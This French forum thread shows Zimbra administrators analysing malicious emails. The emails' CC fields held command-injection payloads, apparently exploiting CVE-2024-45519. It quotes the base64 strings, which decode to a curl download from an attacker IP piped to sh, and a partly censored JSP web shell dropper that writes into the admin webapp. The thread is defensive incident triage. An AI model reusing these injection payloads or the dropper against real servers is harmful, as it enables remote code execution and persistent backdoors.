#1 Le 01/10/2024, à 10:12
- rospionne
[Zimbra] J'ai reçu un mail contenant un script sh dans CC
Bonjour,
J'ai reçu 4 mails contenant dans le champ CC un code bizard (Veuillez ne pas exécuter ce code, risque viral fort) :
CC: ppp`echo${IFS}Li4vLi4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`pppppp@mail.com,ppp`echo${IFS}L29wdC96aW1icmEvY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`pppppp@mail.com
Comment savoir si le serveur Zimbra a exécuter ou non ce genre de code ?
Merci d'avance.
Hors ligne
#2 Le 01/10/2024, à 10:27
- tycooon
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
decode base 64 :
../../common/bin/curl http://xx.xx.xx.xx:443/gpkqrfapqgqgftfn … n/bin/curl
http://xx.xx.xx.xx:443/gpkqrfapqgqgftfnvvdxvzynmrsllsci
A mon avis ça pointe sur une adresse http qui est codée ci dessus en base 64 pour télécharger un script à cette adresse : curl http://xx.xx.xx.xx:443/gpkqrfapqgqgftfnvndxvzynmrslsc
Bien sur évitez de cliquer pour télécharger : \\\\\\Ne jamais exécuter ce genre de commandes /////
Dernière modification par tycooon (Le 01/10/2024, à 11:06)
En ligne
#3 Le 01/10/2024, à 10:29
- LukePerp
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
Faut regarder les logs.
Ce truc a codé une commande utilisant curl. Cherche les logs ayant utilisé curl ainsi que l'adresse ip codé dans ce truc.
Gamer inside - Ubuntu Mate dernière LTS - Intel i5, 16 Go - Dual boot Windows - Ethereum user
Hors ligne
#4 Le 01/10/2024, à 10:55
- rospionne
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
Faut regarder les logs.
Ce truc a codé une commande utilisant curl. Cherche les logs ayant utilisé curl ainsi que l'adresse ip codé dans ce truc.
J'ai regardé les log correspondant au date de reception, j'ai juste l'historique de zimbra qui a reçu ces mails. Rien de plus.
J'ai créer une machine virtuel isolé pour tenter de télécharger son fichier (commande : curl x.x.x.x/hduiqhuizhduiqhd > virus.txt). Rien du tout. Un lien mort
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
J'ai décodé le premier mail qui a un code64 différent et beaucoup plus long (Veuillez ne pas exécuter ce code, d'après gémini, c'est un backdor) :
cd ../../jetty/webapps/zimbraAdmin/public/jsp/&&echo '
<%@ page import="java.io.*,java.util.Base64,java.util.Map,java.util.HashMap,java.net.*"%>
<% StringBuilder ot = new StringBuilder();
class Utils{private final Map<String, String> rt = new HashMap<>();
[...censuré...]}
public String getCookie(String key){for(Cookie cookie:request.getCookies()){
String name=cookie.getName();if(name!=null&&name.equals(key)){return cookie.getValue();}}return null;}
public String decodeBase64(String text){if(text == null){return "";}
try{String bdec = new String(Base64.getDecoder().decode(text));
for(Map.Entry<String,String> entry:this.rt.entrySet()){bdec=bdec.replace(entry.getKey(),entry.getValue());}
return bdec;}catch(Exception e){return "";}}}
[...censuré...]
<%=ot.toString()%>' > zimbraConfig.jsp && touch zimbraConfig.jsp -r Boot.jsp && chmod --reference=Boot.jsp zimbraConfig.jsp
J'ai donc vérifié dans le répertoire. la date de modification est ultérieur à la reception du mail et pas de présence de zimbraConfig.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Conclusion :
Je pense que le pirate cherche une vulnérailité de mon serveur zimbra à travers le champ CC. Et que pour l'instant et heuresement, il a fait choux blanc.
D'après l'entête, dans Received, il utilise la même adresse IP : 79.124.49.86 . Je l'ai donc blacklisté sur mes pare-feux.
Dernière modification par rospionne (Le 01/10/2024, à 11:23)
Hors ligne
#5 Le 01/10/2024, à 11:22
- tycooon
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
tu as regardé dans /opt/zimbra/common/bin/ si tu as quelque chose ? le curl point dans ce répertoire , il vaut mieux être prudent
En ligne
#6 Le 01/10/2024, à 11:26
- rospionne
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
tu as regardé dans /opt/zimbra/common/bin/ si tu as quelque chose ? le curl point dans ce répertoire , il vaut mieux être prudent
Aucun fichier modifié ou créé cette années dans ce répertoire.
Et d'après la base64 du premier poste, il télécharge en sortie consol pour l'exécuter imédiatement.
Dernière modification par rospionne (Le 01/10/2024, à 11:28)
Hors ligne
#7 Le 01/10/2024, à 15:31
- LukePerp
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
si ce code était effectivement dans le champ CC du mail, je vois aucune raison qu'il soit exécuté
Gamer inside - Ubuntu Mate dernière LTS - Intel i5, 16 Go - Dual boot Windows - Ethereum user
Hors ligne
#8 Le 03/10/2024, à 01:46
- JusticeRage
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
Hello ! Je suis un chercheur en cybersécurité, il s'agit d'une tentative d'exploitation de vulnérabilité Zimbra récente (CVE-2024-45519).
Est-ce qu'il serait possible d'avoir une copie des divers blobs base64 complets, ici ou en MP ? Le code JSP complet m'intéresse particulièrement
Hors ligne
#9 Le 03/10/2024, à 11:14
- rospionne
Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC
Vous pouvez faire une recherche google "Ivan Kwiatkowski". Je peux vous envoyer une preuve d'identité par MP si vous avez peur de... euh, je ne sais pas trop de quoi honnêtement mais je peux.
Ma démarche a pour but de comprendre ce que font les attaquants, les campagnes malveillantes en cours et les outils utilisés. C'est un domaine qui s'appelle la "threat intelligence".
Je vous ai envoyé la source du 1er mail contenant le code java en base64 en MP sur votre compte Twitter.
Pour ce qui était de la prudence à votre compte ubuntu-fr créé récement. Il est certaint qu'avoir ce code source ne suffit pas pour attaquer et qu'il n'y a aucune garantie qu'il fonctionne.
Toutefois, si une personne souhaite s'inspirer d'un travail d'un tiers pour son propre compte... Je ne voudrais pas qu'il ai accès au code aussi facilement.
D'où mes questions pour esquiver un éventuel social engineering.
Dernière modification par rospionne (Le 03/10/2024, à 11:15)
Hors ligne